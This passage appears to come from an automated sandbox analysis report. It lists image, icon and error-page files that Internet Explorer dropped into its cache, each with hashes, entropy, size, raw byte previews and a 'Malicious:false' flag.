                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....-.Tt..3..#.......2?.fl.T..!.0..9..e.U.>.,u.7.".p\.:..zRG...bT{..d.V....&.B(..1<.gf.#.Q..!.c4..8#......c?i2>..s..R(.o.5.l2.6...@.m.xC.O#.5%Xm...-.e?.M..jI.<+....c..|....i..$..l..z.\...<aJ...ERBfD.Io'.:...j....\...CE..4..{4.....7|R.)L...l...l}..2.3~;.e.$RH.3.d....G.)X...m..pN.y...3n.........f.Y.X.e..=*.CDM R.[l......E.b$.a.*r..C-.K".b5.G^:.CdpI#......T.&..]T..=8..f..b. ..m
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgLVz[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):16649
                                                Entropy (8bit):7.922396366675045
                                                Encrypted:false
                                                SSDEEP:384:NA5v/9KF/LSZhyMDpqN6teoBMj+8sn+V5VaQmWjO:NA5ozSZhyBEYoBErsnEhmWK
                                                MD5:4035F9FD75175AB6DE70B4BDAD9A055B
                                                SHA1:7587562801349B57565E1992094B9704EC74EA0B
                                                SHA-256:BE74D2288FFD9CF5A34F65FF988A5C6ACD9273EFFFD62F875674B3A1DB1E6A2D
                                                SHA-512:5D429D4DA9598AB5FE06C74A55F549B7486C8D98E817455B6FAC487080DFD5A38A5CD828DDD77A35BA8E6249D440FFB0BCE02D936A76342DC4FB05569CD9181F
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..FOAX\.vC...S..Y.........`.~v.;....m.9?Z..T5......1...t.....S)_....zU"l';....i.."..M.s...,7q.!i....i.{.M.K..\..p.Z..]d}....cax.T..K...9'9.;.Es...;...q.E...r"..x.=...Y8...;.$.\6..+..l..z.Q.!.g.....Y=.X.H.zQ.......B.....8..6.~.O(...S....1......0*..;.q.av.F.\.q......0..%{.....dqN..FzR.\.....&@...+.....R:e!.........#*;b..E!.X..".)\.J..).0..p).NBl..{SH\......0.:.....c;....
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgpXv[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                Category:dropped
                                                Size (bytes):15626
                                                Entropy (8bit):7.962500897509523
                                                Encrypted:false
                                                SSDEEP:384:0JDz3LK/RAsFLqnDKf9aQI7LxXXylceAwl:0JDrLK/RAsF+nGf9aQOtXy7fl
                                                MD5:A52E535F3BC8BC8042A2DA850FA5EAF9
                                                SHA1:A921CB4EB83506A6E60D30F4DEB835DCA3EA6DEC
                                                SHA-256:AAE858FFA5F17507E49190460F62FF561C3EE8798A51464456F4B189DE6834BE
                                                SHA-512:06B934D9CF90F57875F4345F35DD7FF2B344F1C1DB531DA8747F271D185EFF6973B97DBAB20F3755B33E6BFE242198071DC179D0855946218FFDE4FF7CA4ED45
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...nA.<z.....VI?{.#.j.4...{.l.....]ID2..!...8.q.c.._p*p.[..P.)...D..v.:pi...m...+..6r.qZBVD.\.K.qj....G@y..+....g.C:.M.,A ...:...b..V.R..r.Y........ ..Q.-..R.K@O....N..3...m..W..S..Y|..P....nv....J..K.3...nn.....ih....r..z...2..`7.......no.y.......W....4G...O..0..,..NI.&....R.3.SD..LB6..#8..J...C....|..l..)8.1[..c-.0....R..C.I.w..>.....C.4y$..l...G.K.c.t..s..bH.RH.....!.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgzH6[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                Category:dropped
                                                Size (bytes):17001
                                                Entropy (8bit):7.557235539199786
                                                Encrypted:false
                                                SSDEEP:384:IA8xSo7+zIo4rNZQQ4svcGancTZ0KIlBz0IjmOk+lduu/6xIL:IjEUogv4svcbcToN0+Xuuay
                                                MD5:EAECF54AA2CDC33FC2D7238560F601AE
                                                SHA1:1E25B64DA671A1DBEA98643F2357BD04761820D9
                                                SHA-256:B35091DD6B77688B9E49CDD17A2F196E864624B39D2EBB95B63DE927F69B07CD
                                                SHA-512:43C47B5BB9E8339EB207239C3338A6C1E259711F52CDB7852CD3CE657F0A4B2BC2D2583A2C07409208F5959AAE6A7439D00700AE9F8FB3C0C5B2F1FE2D561637
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?............P...."{7..F.4......X..c,>.o..b0=i...9.).i....x,..1..p.y..9.......#.f.Z.Ci.J.;....J.)..@.h.(.4.....P..@..c.h....&....@.ZD..CP3..{s..........>K.6..4...P.8.D.s....!..q..q..b.......`..1.ycx..Z`s...(...S.....@...AL...@.......@....P.P....)=..gUo4O. P..M..8..d.5.p#..][..#.@.M4m.U.9.Cc..q...5.R9X...W.'Im.84....P.t.J....l..........-.(.......`.s..?.;........NK....l..{g.J.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAud6Gv[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):356
                                                Entropy (8bit):7.101459310090333
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPahmpAKG4NDBbCySVUc3/qF9Hio9hbifyZQw+bS2LblMid1Rc9ruhiFp:6v/73bCLVYHio9h8kQw+7BMW1W9rAir
                                                MD5:A94D5FFB98CBCA323E6AEA6A826B9ACF
                                                SHA1:D4F20C419292258A27A06511955A02400C767723
                                                SHA-256:7527C0E97B871894A7AC475D714D51E82F51BB965848DCD03657B12D5808BCAB
                                                SHA-512:D2B0D68C085457161F612B50508548D9FD6F7F48DE74AEC8009C65375A0CF0D58469BC8B93AC2705B4AB4A0F0D3FE07E8207500AD896FFC676D7D50649643A7D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx...j.A.....A..y..X....$.E.'.b.:.h!.bc%...:.FlD..L.@:...F...o...u..+.>nvf..v..n.;08..<.,C....-|A.x.D1.Mx....B.R>.......3..d@....%....v.Z...5.C....3@.a.[..iku.....%.(....p.h..m.](..s>F.&...q.^..dH......0<a1...4. .z.Q.@<W...,....4..?M.b......@{X..L..x...|:.B..B..K...j..k6/..LE@....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB14EN7h[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                Category:dropped
                                                Size (bytes):13764
                                                Entropy (8bit):7.273450351118404
                                                Encrypted:false
                                                SSDEEP:384:IfOm4cIa37nstlEM15mv7OAkrIh4McOD07+8n0GoJdxFhEh8:I2m4pa37stlTgqAjS0GoJd3yK
                                                MD5:DA6531188AED539AF6EAA0F89912AACF
                                                SHA1:602244816EA22CBE39BBD4DB386519908745D45C
                                                SHA-256:C719BE5FFC45680FE2A18CDB129E60A48A27A6666231636378918B4344F149F7
                                                SHA-512:DF03FA1CB6ED0D1FFAC5FB5F2BB6523D373AC4A67CEE1AAF07E0DA61E3F19E7AF43673B6BEFE7192648AC2531EF64F6B4F93F941BF014ED2791FA6F46720C7DB
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......5.D..gJ.ks@..(...@.........l..pE..iT...t&..V.M..h....4.m.-.!....:...........*...a...CQ...c....Fj....F(...5 ..<.....J..E.0."..].6...B.K........k.t.A'p..KJ..*A....(......(......(......(......(......(......(......(......(.......K1......:...0......I...M.9..n..d.Z.e.Q..HfE....l^...h.h.t....(.9:.2....z...@.....:...3..w.@.P4Ac1.a.@...A#.P1... ..4..@.@.(.h.h.(....0....Y..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB14hq0P[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                Category:dropped
                                                Size (bytes):19135
                                                Entropy (8bit):7.696449301996147
                                                Encrypted:false
                                                SSDEEP:384:IHtFIzAsGkT2tP9ah048vTWjczBRfCghSyOaWLxyAy3FN5GU643lb1y6N0:INFIFTsEG46SjcbmaWLsR3FNY/Ayz
                                                MD5:01269B6BB16F7D4753894C9DC4E35D8C
                                                SHA1:B3EBFE430E1BBC0C951F6B7FB5662FEB69F53DEE
                                                SHA-256:D3E92DB7FBE8DF1B9EA32892AD81853065AD2A68C80C50FB335363A5F24D227D
                                                SHA-512:0AF92FBC8D3E06C3F82C6BA1DE0652706CA977ED10EEB664AE49DD4ADA3063119D194146F2B6D643F633D48AE7A841A14751F56CC41755B813B9C4A33B82E45C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..h.h........(.h........(.h......Z.(........(.h........TNY...W....q@..~..<..h.....dG.@.........F....L.@%}.....-K.F.9...c..O.7X9u,%.k.4..4..c.<p"...cp.-...U.J.n2..9.b.d.SphR.\V.5Q-./.LV.6...HM.V.d^E...F.q.*+7..a.m..VOA..qR.X.rx5&.(..Q..P.R..x..WM-.?........V..GTi.(.(........(........J.(.(......J.(........Z.(........Z.(........Z.(........(.h.......i..H.@...;..Y...q...0.<e+.B...[.v..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1aXBV1[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):1161
                                                Entropy (8bit):7.80841974432226
                                                Encrypted:false
                                                SSDEEP:24:zxxmempCXfPZq+DLeP1cRwZFIjvh3wuiFZMrFYzWkG4iD3w:zxRBXfB9k1cRuFIbJWsFYT/2w
                                                MD5:D858BE67BEA11BF5CEC1B2A6C1C1F395
                                                SHA1:6090B195BEF6AF1157654048EECEA81E2DCEC42A
                                                SHA-256:FC7CF2E8592C8E63CFF72530DA560E3293EC2DE3732823DBAEB4464609EA0494
                                                SHA-512:180FA05957A2FCF8192006D5F8E8D3E4DE1D79DD6F9F100D254C513068FC291B3086DE9A8897B3658D83FE3335FDEB4023F13AC3A6A8A507729AE22B621EC7D7
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................U....pHYs..........+.....;IDATx...}..c.....j...2..Y.l....i.<4.c...)..p...M..(4b.Z.r...."cDe..Bz..sw.g.9.....^..u}?....n[he.{..,u.....`.>.[.iE...[.1B.Tx..X.7......0.[.....5.)p...x...d\...g..........WmE1.sl......u....3K.[......;...........f....W(.E3//6...2tG..AU...`7f.m. r;..r..{.~.X./.Q._..`.C...D.M.n.p%..U...0...HTe..1......7.@.Tn.r......C.k.../[..j.X..:.+Q.3.y.4. ,E....g.Y...p^..c..:..#/...iES....E.w..op.... .9.W........).+.1....A~.\...{...q.El..`.&;...o.&q:.K....|.....e.(..."9.z\.~.....G.h...\.'.;... G........J....P.gy..<BeK.I..<..d..MF".O.uE...R..-...{..J...F..*.a..lj...t\.W.....&.l|?...WvP...._o.c.....8..10;.q-"8L.2..~,....~V..|]..c..\.'...I.....u8.......Q.3..lB."..!LD.bs.K[..)0P0.9..'....K...W..g..,f.........S......S..)N..D;.....<.....7#..X2.ws.....H.vF'...,$l..R4.O/.~..j.'&..6.........!.D.m..].G........W#.Uir..sT..m....h...UN.._V#..S.6.....i..M....[..?.J.....OL\..Q<{.G.n5).Ix.....<+7Ey.....W.].NR.o...._.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1cG73h[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):1131
                                                Entropy (8bit):7.767634475904567
                                                Encrypted:false
                                                SSDEEP:24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
                                                MD5:D1495662336B0F1575134D32AF5D670A
                                                SHA1:EF841C80BB68056D4EF872C3815B33F147CA31A8
                                                SHA-256:8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
                                                SHA-512:964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................U....pHYs..........+......IDATx..U=l.E.~3;w{..#].Dg!.SD...p...E....PEJ.......B4.RE. :h..B.0.-$.D"Q 8.(.;.r.{3...d...G......7o..9....vQ.+...Q......."!#I......x|...\...& .T6..~......Mr.d.....K..&..}.m.c.....`.`....AAA..,.F.?.v..Zk;...G...r7!..z......^K...z.........y...._..E..S....!$...0...u.-.Yp...@;;;%BQa.j..A.<)..k..N.....9.?..]t.Y.`....o....[.~~..u.sX.L..tN..m1...u...........Ic....,7..(..&...t.Ka.]..,.T..g.."...W......q....:+t.?6....A..}...3h.BM/.....*..<.~..A.`m...:.....H...7.....{.....$... AL..^-...?5FA7'q..8jue...*.....?A...v..0...aS.*:.0.%.%"......[.=a......X..j..<725.C..@.\. ..`.._....'...=....+.Sz.{......JK.A...C|{.|r.$.=Y.#5.K6.!........d.G...{......$.-D*.z..{...@.!d.e...&..o...$Y...v.1.....w..(U...iyWg.$...\>..].N...L.n=.[.....QeVe..&h...`;=.w.e9..}a=.......(.A&..#.jM~4.1.sH.%...h...Z2".........RP....&.3................a..&.I...y.m...XJK..'...a......!.d.......Tf.yLo8.+.+...KcZ.....|K..T....vd....cH.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB6Ma4a[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):368
                                                Entropy (8bit):6.811857078347448
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPahm7HmoUvP34NS7QRdujbt1S+bQkW1oFjTZLKrdmhtIargWoaf90736wDm:6v/7xkHA2QRdsbt1pBcrshtvgWoaO7qZ
                                                MD5:C144BE9E6D1FA9A7DB6BD090D23F3453
                                                SHA1:203335FA5AD5E9D98771E6EA448E02EE5C0D91F3
                                                SHA-256:FAC240D4CA688818C08A72C363168DC9B73CFED7B8858172F7AD994450A8D459
                                                SHA-512:67B572743A917A651BD05D2C9DCEC20712FD9E802EC6C1A3D8E61385EB2FEBB1F19248F16E906AF0B62111B16C0EA05769AEA1C44D81A02427C1150CB035EA78
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+....."IDATx.cy. ..?...|.UA....GX...43.!:.o(f..Oa`..C...+Z0.y......~..0...>.....(....X3H.....Y....zQ4.s0....R.u.*t..|....)....(.$.`..a...d.qd.....3...W_...}.*...;.........4.....>....N....)d........p.4......`i.k@QE....j....B....X.7....|..0.....pu?.1B,...J..P.......`F.>R..2.l.(..3J#.L4...9[...N....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBVuddh[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):316
                                                Entropy (8bit):6.917866057386609
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPahmxj1eqc1Q1rHZI8lsCkp3yBPn3OhM8TD+8lzjpxVYSmO23KuZDp:6v/7j1Q1Q1ZI8lsfp36+hBTD+8pjpxy/
                                                MD5:636BACD8AA35BA805314755511D4CE04
                                                SHA1:9BB424A02481910CE3EE30ABDA54304D90D51CA9
                                                SHA-256:157ED39615FC4B4BDB7E0D2CC541B3E0813A9C539D6615DB97420105AA6658E3
                                                SHA-512:7E5F09D34EFBFCB331EE1ED201E2DB4E1B00FD11FC43BCB987107C08FA016FD7944341A994AA6918A650CEAFE13644F827C46E403F1F5D83B6820755BF1A4C13
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx....P..?E....U..E..|......|...M.XD.`4YD...{.\6....s..0.;....?..&.../. ......$.|Y....UU)gj...]..;x..(.."..$I.(.\.E.......4....y.....c...m.m.P...Fc...e.0.TUE....V.5..8..4..i.8.}.C0M.Y..w^G..t.e.l..0.h.6.|.Q...Q..i~.|...._...'..Q...".....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBXXVfm[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):842
                                                Entropy (8bit):7.712790381238881
                                                Encrypted:false
                                                SSDEEP:24:03eeNY8QugsamcgusRa+4Sm81pdhTaXHir8L:0fNY8QuosS+4SmetsL
                                                MD5:4F44C5854D2A321DE38DDA7580D99D2A
                                                SHA1:637217CD4AB94060B945D364D6AD80BB173F41B7
                                                SHA-256:77E9AF4EF4CEC6BAE0181D3173577BE0488DE8DB5FA71D2E5C7E05B5D5D27565
                                                SHA-512:AC46863DDFE68156E7D76DDE08C299459B8C01CD8B2DB9DB5C3A4434D5CF34F6162556A29EBBCA401810ED5AD5F9BE57090E819DDED688EE7C36D179A1FBF3F6
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx.e.Oh\U......2.....65...\...].,ZT...Z(...U.....t...P.P..P(.n.Vl.JA......%3...h.i&3y/.z........}.;.|.<.J.6.fcr:LZ-..+...(...Pp.......,y..=..D......V:...Q,....r...5.hI[.a..A.....93.K>.st.........Dq..&....2)..bl.Y.........._..4Ag..s.(l?A..>..m.M.W..O...C....f.......r.^;<...r...n.....9.......t..<.I.r|......|1?S.|......#0..O@.6=}.....q.^..NX.9*.Gh..Q.!i6...A.,..&.5+...o...dod...J......D'CS:....../...:......X|..zH....$#}5K..x^.-.-.X>@.'.W .+.~../..z.o_H.~IF.f.o.}[,.eh,=.....W-....Tf?..........t5$~b...Pgq..6..o}9v..'......KJ.I.|MT.....d..i..7..^.....i2....l..W.X..a.].V...UWf...fd....=.1~K....[.dX...dV..J.......eL....O.....R. .T._.wGr2...W.x. .W......I....4X....Y~.$.c...v\o_^...S......O.z..gV.T..............x...{..7..3i.@%.....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBZ3zrM[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):763
                                                Entropy (8bit):7.621723844116318
                                                Encrypted:false
                                                SSDEEP:12:6v/7N5fvaQCJmEzDuMi5ld08fuKGi9o4eUTE5xDgic9NEm652PPanadeh7jteQ8c:IBihmEGMi5ltfDPu4E5iic9NEp52kl9
                                                MD5:CFE739AEAE33DC7C7BB02D24E081F0CE
                                                SHA1:CBE000F23A34635EF4518C919A234DC4A3635C1E
                                                SHA-256:A1F6D07C79B387A99C2550B0E24AD030964EB42ACBA18F21F2D790A05499BAF3
                                                SHA-512:E8CD4F90716E62E4A0A8B9817794F55517CA52EC75F634E55462BBFDFB288076C1992298DB5578C84EC695D3B23BE6FF1AD80EDEEBA8435AAF96B6B32C711C5D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx.]SKO.Q...s;e:.}.}@.._....hb..b..kw........M\..t.0j....|"..E.2..C...S..M...s..;.~W..<.....=>......J.P..?.L........Pf.eB.BU...@.^"1(..05.]UA0....g..N.....H.K.L..P..z....;N..O.pi<...{oVpc*.[..D...@6.a,2....<..sq.h.h~.s.*..I.@L.....h8......)$.4.B.*.....3...m.&..H.....1...8.7...0...u..k.)d..\.;@...:m..*.Tc.....$.v..a..v.x.(;{..G...+...QY..L.N....;E......T..>@r(.;''d...0...../.nT.01...P!...5...P.....`...b.Q....k6.*..l....R.....P.Pw.t;..T.R...6[...\.l.7'Gpq$...[.Z.%....jb..`e..T.X...C.Y#.W..\.....B.B..mR...p.0.?.J..[.....K...Sl....."B.b.A...@.-..w.`E*.-.w..@<(,Ki.^O...zY^.. 7..4E.oyN..e..'.j.4...4ST .?.D.G....(...C..<.....8E...<?......../..X^c..j....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBkwUr[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):436
                                                Entropy (8bit):7.255906495097201
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPahm/BBjoPHhOVDqpp05cMxyHtGUmmozY7JE3R+hRMCzRPasXQc01UaVesl:6v/7MHQg25b8Ht3VEMNQ2w5
                                                MD5:01B5E74F991A886215461BF0057008C7
                                                SHA1:6A7347C3559814722D7AA4D491A0D754E157FCC5
                                                SHA-256:DB8A0C0A44AEE824F689A942D99802F95D7950758CB0739C7F179624A592CD51
                                                SHA-512:17820A7C90B35B0E45D0A07F5445D8C97BFD3098FD9E0F0283CD6CFC1DB2B33C651924D2F04EF398C147CEB8D7DEA3F591DBC19F9039279407C4E4231AC5F5B7
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+.....fIDATx.}..M.@.......0...Aa.......#0..."..0....a....<....<....y..qS......m..k..%.'|.......`....Z.`x...X............Np..x........a%(..ab........=.....j.[....0}.>.O..R~..<@y....nV..:.q.....G.P.e..............?s....i^l.P..5.0....?...&.A.K..|+...X.h)....5K...Zx...[....G...0N<.~PC.@.X.O2..N..x...:?..7.xH.&.......C3..8....Q.*.>...W..~..].U..U>L/....Le&.......IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\NewErrorPageTemplate[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1612
                                                Entropy (8bit):4.869554560514657
                                                Encrypted:false
                                                SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                MD5:DFEABDE84792228093A5A270352395B6
                                                SHA1:E41258C9576721025926326F76063C2305586F76
                                                SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\NewErrorPageTemplate[2]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1612
                                                Entropy (8bit):4.869554560514657
                                                Encrypted:false
                                                SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                MD5:DFEABDE84792228093A5A270352395B6
                                                SHA1:E41258C9576721025926326F76063C2305586F76
                                                SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\checksync[3].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):21628
                                                Entropy (8bit):5.304819777739522
